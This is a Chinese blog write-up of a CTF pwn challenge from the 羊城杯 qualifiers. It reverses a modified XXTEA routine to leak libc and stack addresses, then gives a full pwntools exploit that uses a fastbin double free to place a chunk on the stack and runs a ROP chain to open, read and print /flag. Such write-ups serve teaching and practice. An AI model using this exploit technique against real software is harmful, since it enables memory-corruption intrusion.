羊城杯_Quals_repwn

羊城杯 re_pwn

记一次坑爹的house of force

首先程序的逻辑很清楚:
add()限制size大小为0~0x68,dele()存在double free,show函数先允许向stack上输入,之后进行加密输出。

程式唯一的输出就是加密后的输出,因此此处是leak地址的地方,如果我们不输入的话加密的内容就是存在stack上的内容,通过解密可以拿到地址。

1
2
3
4
5
6
7
8
9
10
11
pwndbg> stack 40
00:0000│ rsp  0x7fffffffdb70 ◂— 0x0
01:0008│      0x7fffffffdb78 —▸ 0x7fffffffddb8 —▸ 0x7fffffffe1a2 ◂— 'XDG_SEAT=seat0'
02:0010│      0x7fffffffdb80 —▸ 0x7fffffffdda8 —▸ 0x7fffffffe176 ◂— '/mnt/hgfs/share/ctf_in_2020/pwn/ycbctf/pwn2'
03:0018│      0x7fffffffdb88 ◂— 0x1f7ffe700
04:0020│      0x7fffffffdb90 ◂— 0x1f3c5d139400
05:0028│      0x7fffffffdb98 ◂— 0x1000000002
06:0030│ rdx  0x7fffffffdba0 ◂— 0x1200000033 /* '3' */
07:0038│      0x7fffffffdba8 ◂— 0x2400000078 /* 'x' */
08:0040│ rdi  0x7fffffffdbb0 —▸ 0x7ffff7ffea88 —▸ 0x7ffff7ffe9b8 —▸   libc地址 0x7ffff7ffe728 —▸ 0x7ffff7ffe700 ◂— ...
09:0048│      0x7fffffffdbb8 —▸ 0x7fffffffdbf0 —▸ 0x7ffff7ffa280 ◂— add      byte ptr ss:[rax], al /* '6' */       stack地址

可见通过解密可以得到stack地址和libc地址。

加密算法为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
__int64 __fastcall sub_E95(_BYTE *a1, int a2, __int64 a3)
{
  __int64 v3; // rdx
  __int64 result; // rax
  __int64 v5; // [rsp+0h] [rbp-38h]
  unsigned __int8 v6; // [rsp+26h] [rbp-12h]
  unsigned int sum; // [rsp+28h] [rbp-10h]
  unsigned int i; // [rsp+2Ch] [rbp-Ch]
  int num; // [rsp+30h] [rbp-8h]
  int v10; // [rsp+34h] [rbp-4h]

  v5 = a3;                                      // a1=buf
                                                // a2=16
                                                // a3='/* 3 */'
  if ( a2 > 1 )
  {
    num = 35 / a2 + 7;                          // 9次
    sum = 0;
    v6 = a1[a2 - 1];                            // buf[15]
    do
    {
      sum += 0x76129BDA;
      v10 = (sum >> 2) & 3;
      for ( i = 0; a2 - 1 > i; ++i )            // 15轮
      {
        a1[i] += (((v6 >> 7) ^ (8 * a1[i + 1])) + ((a1[i + 1] >> 2) ^ (32 * v6)) - 33) ^ ((a1[i + 1] ^ sum ^ 0x57)
                                                                                        + (v6 ^ *(unsigned int *)(4LL * (v10 ^ i & 3) + v5))
                                                                                        + 63);
        v6 = a1[i];
      }
      a1[a2 - 1] += (((v6 >> 7) ^ (8 * *a1)) + ((*a1 >> 2) ^ (32 * v6)) - 33) ^ ((*a1 ^ sum ^ 0x57)
                                                                               + (v6 ^ *(unsigned int *)(4LL * (v10 ^ i & 3) + v5))
                                                                               + 63);
      v3 = a2 - 1LL;
      result = (unsigned __int8)a1[v3];
      v6 = a1[v3];
      --num;
    }
    while ( num );
  }
  return result;
}


比较明显的地方在于0x76129BDA,这个数值一般存在于tea加密算法中,比较一下:

```c
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))

void btea(uint32_t *v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1)            /* Coding Part */
    {
        rounds = 6 + 52/n;
        sum = 0;
        z = v[n-1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p=0; p<n-1; p++)
            {
                y = v[p+1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n-1] += MX;
        }
        while (--rounds);
    }
    else if (n < -1)      /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52/n;
        sum = rounds*DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p=n-1; p>0; p--)
            {
                z = v[p-1];
                y = v[p] -= MX;
            }
            z = v[n-1];
            y = v[0] -= MX;
            sum -= DELTA;
        }
        while (--rounds);
    }
}


int main()
{
    uint32_t v[2]= {1,2};
    uint32_t const k[4]= {2,2,3,4};
    int n= 2; //n的绝对值表示v的长度,取正表示加密,取负表示解密
    // v为要加密的数据是两个32位无符号整数
    // k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位
    printf("加密前原始数据:%u %u\n",v[0],v[1]);
    btea(v, n, k);
    printf("加密后的数据:%u %u\n",v[0],v[1]);
    btea(v, -n, k);
    printf("解密后的数据:%u %u\n",v[0],v[1]);
    return 0;
}

发现程序在调用加密函数前也有4个key,而且只是MX和DELTA不同,可认定是btea算法改的,因此写出解密脚本为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#define DELTA 0x76129BDA
#define MX ( ( ((z>>7)^(y<<3)) + ((y>>2)^(z<<5))-0x21 ) ^ ((sum^y^0x57) + (key[(p&3)^e] ^ z)+0x3f) )
// #define MX (((((z>>7)^(y<<3)) + ((y>>2)^(z<<5)))-0x21) ^ (((sum^y^0x57) + (key[e^p&3] ^ z))+0x3f))
void btea(uint8_t *v, int n, uint32_t const key[4])
{
	uint8_t y,z;
    uint32_t sum;
    unsigned p, rounds, e;
    if (n > 1)            /* Coding Part */
    {
        rounds = 7 + 35/n;
        sum = 0;
        z = v[n-1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p=0; p<n-1; p++)
            {
                y = v[p+1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n-1] += MX;
        }
        while (--rounds);
    }
    else if (n < -1)      /* Decoding Part */
    {
        n = -n;
        rounds = 7 + 35/n;
        sum = rounds*DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p=n-1; p>0; p--)
            {
                z = v[p-1];
                y = v[p] -= MX;
            }
            z = v[n-1];
            y = v[0] -= MX;
            sum -= DELTA;
        }
        while (--rounds);
    }
}


int main()
{
    uint8_t v[32]= {0};
    uint32_t const k[4]= {0x33,0x12,0x78,0x24};
    int n= 16;

	read(0,v,0x10);
    btea((uint8_t*)v, -n, k);
    write(1,v,0x10);
    return 0;
}

编译为ELF再process进来即可解密。

之后的利用思路就很明显的hof了,先double free把堆申请到栈上,然后rop读flag。

要注意的是:heap大小最大0xx68不够用来完成rop,因此要先构造一次read以读入rop。

第一次覆盖返回地址是在read写content的时候,由于call read时将返回地址push rsp,之后并没有扩展栈帧的操作,因此之后将对应存放ret_addr的地方覆盖成执行gadget的地址即可。

最后exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
context.log_level='debug'
DEBUG=1
if DEBUG:
	p=process("./pwn2")
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
	p=remote('183.129.189.60',10029)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

def cmd(command):
	p.recvuntil("choice:")
	p.sendline(str(command))

def add(sz,content):
	cmd(1)
	p.recvuntil("?")
	p.sendline(str(sz))
	sleep(0.1)
	p.send(content)

def dele(idx):
	cmd(3)
	p.recvuntil("?")
	p.sendline(str(idx))

def show(content):
	cmd(2)
	p.send(content)


def pwn():
	# gdb.attach(p)
	show('\n')
	enc = p.recvuntil("wellcome",drop=True)
	p1 = process("./dec")
	p1.send(enc)
	dec = p1.recv(0x10)
	libc.address = u64(dec[:8]) - 0x5f1a88
	stack = u64(dec[8:])
	add(0x68,"AAAAAAAA\n")
	add(0x68,"AAAAAAAA\n")
	dele(0)
	dele(1)
	dele(0)
	success("libc: " + hex(libc.address))
	success("stack: " + hex(stack))
	add(0x68,p64(stack-0xf3)+'\n')
	add(0x68,"AAAAA\n")

	p_rdi = 0x000000000019dc65 + libc.address
	p_rsi = 0x000000000013cd4f + libc.address
	p_rdx = 0x0000000000115166 + libc.address
	p_rax = 0x000000000003a738 + libc.address
	syscall_ret = 0x00000000000bc3f5 + libc.address
	rop_chain = [
		p_rdx,0x200,p_rax,0,
		syscall_ret
	]
	payload=p64(p_rdx)+p64(0x200)+p64(p_rax)+p64(0)+p64(syscall_ret)
	# payload = flat(rop_chain)
	# debug(0x000000000000E62)
	# pause()
	# gdb.attach(p)

	add(0x68,"AAAAA\n")
	add(0x68,"A"*0x2b+payload+'\n')
	payload=p64(p_rdi)+p64(stack-0xb4+0x1c)+p64(p_rsi)+p64(0)+p64(p_rdx)+p64(0)+p64(p_rax)+p64(2)+p64(syscall_ret)
	payload+=p64(p_rdi)+p64(3)+p64(p_rsi)+p64(stack+0x300)+p64(p_rdx)+p64(0x30)+p64(p_rax)+p64(0)+p64(syscall_ret)
	payload+=p64(p_rdi)+p64(1)+p64(p_rsi)+p64(stack+0x300)+p64(p_rdx)+p64(0x30)+p64(p_rax)+p64(1)+p64(syscall_ret)
	# pause()
	# gdb.attach(p)
	p.sendline('A'*(0x4b)+'/flag\x00\x00\x00'+payload)

	p.interactive()

if __name__ == '__main__':
	pwn()

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>